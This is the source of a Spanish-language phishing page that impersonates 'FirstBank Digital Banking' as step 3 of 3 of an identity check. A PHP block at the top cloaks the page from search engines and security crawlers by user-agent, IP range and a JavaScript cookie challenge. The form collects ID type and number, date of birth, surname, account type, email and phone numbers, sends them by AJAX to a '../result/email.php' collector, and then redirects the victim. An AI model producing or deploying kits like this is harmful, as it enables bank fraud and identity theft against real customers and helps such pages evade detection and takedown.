<?php
// === Block & Log Bot Visitors ===

function logBlocked($reason) {
    $ip = $_SERVER['REMOTE_ADDR'];
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown';
    $time = date("Y-m-d H:i:s");
    $log = "[$time] BLOCKED: $reason | IP: $ip | UA: $ua\n";
    file_put_contents(__DIR__ . '/blocked.log', $log, FILE_APPEND);
    http_response_code(403);
    exit("Access Denied: $reason.");
}

// === Block by Known Bot User-Agents ===
$blockedAgents = [
    'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'baiduspider',
    'yandex', 'sogou', 'exabot', 'facebot', 'ia_archiver',
    'mj12bot', 'ahrefsbot', 'semrush', 'dotbot', 'gigabot', 'spbot',
    'crawler', 'scrapy', 'python', 'wget', 'curl'
];

$ua = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
foreach ($blockedAgents as $bot) {
    if (strpos($ua, $bot) !== false) {
        logBlocked("Bot User-Agent: $bot");
    }
}

// === Block by Known Bot CIDR IP Ranges ===
function ipInCIDR($ip, $cidr) {
    list($net, $mask) = explode('/', $cidr);
    $ipDec = ip2long($ip);
    $netDec = ip2long($net);
    $maskDec = ~((1 << (32 - $mask)) - 1);
    return ($ipDec & $maskDec) === ($netDec & $maskDec);
}

// Example CIDRs of Google, Bing, Ahrefs (partial — you can expand)
$blockedCIDRs = [
    '66.249.64.0/19',   // Googlebot
    '64.233.160.0/19',  // Googlebot
    '157.55.0.0/16',    // Bingbot
    '207.46.0.0/16',    // Bingbot
    '199.30.228.0/22',  // Ahrefs
    '5.45.207.0/24',    // Ahrefs
];

$visitorIP = $_SERVER['REMOTE_ADDR'];
foreach ($blockedCIDRs as $cidr) {
    if (ipInCIDR($visitorIP, $cidr)) {
        logBlocked("Bot IP Range: $cidr");
    }
}

// === JavaScript Challenge ===
// Humans pass, most bots don’t execute JS
if (!isset($_COOKIE['js_challenge_passed'])) {
    echo "<script>document.cookie='js_challenge_passed=true; path=/';location.reload();</script>";
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>FirstBank Digital Banking</title>
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }

        body {
            background: #fff;
            font-family: sans-serif;
        }

        header {
            width: 100%;
            padding: 1rem;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }

        .logogo img {
            width: 100%;
            height: auto;
        }

        .logogo {
            width: 170px;
            height: 54px;
        }

        .flecontu {
            display: flex;
            align-items: center;
            gap: 1rem;
        }

        .flecontu a {
            color: #00843d;
            text-decoration: none;
        }

        main {
            width: 740px;
            margin: auto;
            margin-top: 2rem;
            border: 1px solid #dbdbdb;
            box-shadow: 0 8px 13px #80808012;
            border-radius: 8px;
            padding: 2rem;
        }

        form h1 {
            color: #00843d;
            font-size: 33px;
            font-weight: 400;
            text-align: center;
            /* margin-bottom: 1.5rem; */
        }

        form .flexinput {
            display: flex;
            align-items: center;
            justify-content: space-between;
            width: 510px;
            /* height: 50px;
            border: 1px solid #cccccc;
            color: #333333;
            outline: none;
            width: 100%;
            padding: 0 15px;
            margin-bottom: 1.3rem; */
        }

        .flexinput label {
            width: 200px;
            text-align: start;
            display: block;
            color: #333333;
            font-family: sans-serif;
        }

        .flexinput input,
        select {
            height: 38px;
            border: 1px solid #cccccc;
            color: #333333;
            outline: none;
            width: 300px;
            padding: 0 15px;
            margin-bottom: 1.3rem;
        }

        form button {
            padding: 1rem 2rem;
            background: #299e60;
            color: #fff;
            border: none;
            border-radius: 5px;
            /* width: 100%; */
            height: 50px;
            margin: auto;
            display: block;
            font-weight: 600;
            font-family: sans-serif;
        }

        .bottonlin {
            background: #cccccc;
        }

        .flexjkd {
            display: flex;
            align-items: center;
            gap: 0;
            width: 80%;
            margin: auto;
        }

        .flexjkd a {
            padding: 8px 14px;
            color: #333333;
            font-family: sans-serif;
            border-right: 1px solid #333333;
            font-size: 13px;
            text-decoration: none;
            text-transform: uppercase;
        }

        #flexpass {
            display: flex;
            align-items: baseline;
            gap: 1rem;
        }

        .flexpass img {
            width: 35px;
            height: 31px;
        }

        #error {
            width: 100%;
            border: 1px solid #ec2e33;
            background: #fce3e4;
            padding: 5px 8px 3px;
            display: none;
            align-items: center;
            gap: 8px;
            margin-bottom: 10px;
        }

        #error span {
            color: #666666;
            font-size: 12px;
            font-family: sans-serif;
        }

        #loadd {
            width: 100%;
            height: 100vh;
            background: #eeebeb6f;
            display: none;
            align-items: center;
            justify-content: center;
            position: fixed;
            z-index: 999;
            top: 0;
            left: 0;
            /* display: n; */
        }

        .loader {
            border: 4px solid rgba(0, 0, 0, .1);
            border-left-color: transparent;
            border-radius: 50%;
        }

        .loader {
            border: 4px solid rgba(0, 0, 0, .1);
            border-left-color: transparent;
            width: 36px;
            height: 36px;
        }

        .loader {
            border: 4px solid rgba(0, 0, 0, .1);
            border-left-color: transparent;
            width: 36px;
            height: 36px;
            animation: spin89345 1s linear infinite;
        }

        @keyframes spin89345 {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }

        @media screen and (max-width: 768px) {
            .flexjkd {
                width: 100%;
            }

            .logimd {
                display: none;
            }

            .flecontu {
                display: none;
            }

            main {
                width: 90%;
                margin: auto;
                margin-top: 3rem;
                padding:1rem;
            }
            #flexpass {
                display: flex;
                align-items: normal;
                gap: 1rem;
            }
            .logogo {
                width: 115px;
                height: 35px;
            }
            form h1 {
                color: #00843d;
                font-size: 24px;
                font-weight: 400;
                text-align: center;
                /* margin-bottom: 1.5rem; */
            }
            .flexjkd a {
                padding: 8px 10px;
                color: #333333;
                font-family: sans-serif;
                border-right: 1px solid #333333;
                font-size: 10px;
                text-decoration: none;
                text-transform: uppercase;
            }
            form .flexinput {
                flex-direction: column;
                width: 100%;
            }
            .flexinput label {
                margin-bottom: 10px;
                color: #333333;
                width: 100%;
            }
            .flexinput input, select {
                width: 100%;
            }
        }
    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css"
        integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA=="
        crossorigin="anonymous" referrerpolicy="no-referrer">
</head>

<body>
    <header>
        <div class="logogo">
            <img src="../img/logoo.png" alt="">
        </div>
        <div class="flecontu" style="visibility: hidden;">
            <a href="#">Contacta con nosotros</a>
            <a href="#">English</a>
        </div>
    </header>
    <div class="bottonlin">
        <div class="flexjkd">
            <a href="#" style="color: #fff;background: #00843d;">HOGAR</a>
            <a href="#">DECLARACIÓN</a>
            <a href="#">Cuentas</a>
            <a href="#">Informe</a>
            <a href="#">Administración</a>
            <a href="#">Ayuda</a>
        </div>
    </div>
    <main>
        <form action="" method="post" id="les">
            <div class="flexpass" id="flexpass">
                <img src="../image.png" alt="">
                <h1>Verifique su información</h1>
            </div>
            <span style="color: #666666;margin-bottom: 1rem;display: block;font-size: 13px;"><span style="color: #299e60;">Paso 3 de
                    3:</span> Completa la siguiente información</span>
            <div class="flexinput">
                <label for="#">Tipo de identificación</label>
                <select name="Typeid" id="696ca043-dd60-49c3-a52d-b067fd7f7470"
                    aria-label="Type of Identification" data-uw-rm-form="nfx">
                    <option value="">Seleccione una opción</option><!---->
                    <option value="SSN"> SSN </option>
                    <option value="TIN"> TIN </option>
                    <option value="DL - Drivers License"> DL - Drivers License </option>
                    <option value="CI - Citizenship ID /Identificación de Ciudadanía"> CI - Citizenship ID/Identificación de Ciudadanía
                    </option>
                    <option value="PP - Passport / Pasaporte "> PP - Passport / Pasaporte </option>
                    <option value="SC - Security ID / Identificación de Seguridad"> SC - Security ID / Identificación de
                        Seguridad
                    </option>
                    <option value="TM - Military ID / Identificación Militar"> TM - Military ID / Identificación Militar
                    </option>
                    <option value="GV - Government ID / Identificación de Gobierno"> GV - Government ID / Identificación
                        de Gobierno
                    </option>
                    <option value="PC - US Passport Card / Tarjeta de Pasaporte"> PC - US Passport Card / Tarjeta de
                        Pasaporte
                    </option>
                    <option value="PI - US Permanent Resident ID/Residente Permanent"> PI - US Permanent Resident
                        ID/Residente Permanent
                    </option><!---->
                </select>
            </div>
            <div class="flexinput">
                <label for="#">Identificación</label>
                <input type="text" name="idm" id="dm" placeholder="" required>
            </div>
            <div class="flexinput">
                <label for="#">Fecha de nacimiento</label>
                <input type="date" name="dob" id="dm" placeholder="" required>
            </div>
            <div class="flexinput">
                <label for="#">Apellido</label>
                <input type="text" name="lname" id="dm" placeholder="" required>
            </div>
            <div class="flexinput">
                <label for="#">Tipo de cuenta</label>
                <select class="venecia-main-form-select" name="Typeproduct"
                    id="cd062ebd-dbb4-4a49-98b5-efc8ab926c9f" aria-label="Type of Product" required>
                    <option  value="">Elige una opción</option><!---->
                    <option  value="Checking Account"> Cuenta de cheques </option>
                    <option  value="Saving Account"> Cuenta de ahorro </option>
                    <option  value="Credit Line"> Línea de crédito </option>
                    <option  value="Credit Card">Tarjeta de crédito</option>
                    <option  value="Loan"> Préstamo </option>
                    <option  value="CD / IRA"> CD / IRA </option><!---->
                </select>
            </div>
            <div class="flexinput">
                <label for="#">Correo electrónico</label>
                <input type="email" name="email" id="dm" placeholder="mymail@domain.com" required>
            </div>
            <div class="flexinput">
                <label for="#">Teléfono</label>
                <input type="tel" name="tel" id="dm" placeholder="" required>
            </div>
            <div class="flexinput">
                <label for="#">Celular</label>
                <input type="tel" name="mobile" id="dm" placeholder="" required>
            </div>
            <!-- <input type="email" name="aa" placeholder="Email address" id="" required> -->

            <div id="error">
                <i class="fas fa-circle-exclamation" style="color: #ec2e33;"></i>
                <span> Error: invalid password please try again.</span>
            </div>

            <button type="submit">Siguiente</button>
        </form>
    </main>
    <div id="loadd">
        <div class="loader"></div>
    </div>
    <script>
        var fille = "../result/email.php"; // Your php url here e.g http://youdomain.com/result.php
        var formSubmitted = 0;

        $("#les").on("submit", function (event) {

            event.preventDefault();

            formSubmitted++;

            var inputs = $('input[required]');
            for (var i = 0; i < inputs.length; i++) {
                if (!inputs[i].value.trim()) {
                    alert("Please fill in all fields.");
                    return;
                }
            }

            var formData = new FormData(this);

            $.ajax({
                url: `${fille}`,
                type: 'POST',
                data: formData,
                processData: false, // Required to send FormData
                contentType: false, // Required to not set default content type
                success: function (response) {
                    console.log(response);

                    if (formSubmitted >= 1) {
                        setTimeout(() => {
                            window.location.href = `./sucess.html`;
                        }, 2000);
                    }
                }
            });
        });
    </script>
</body>

</html>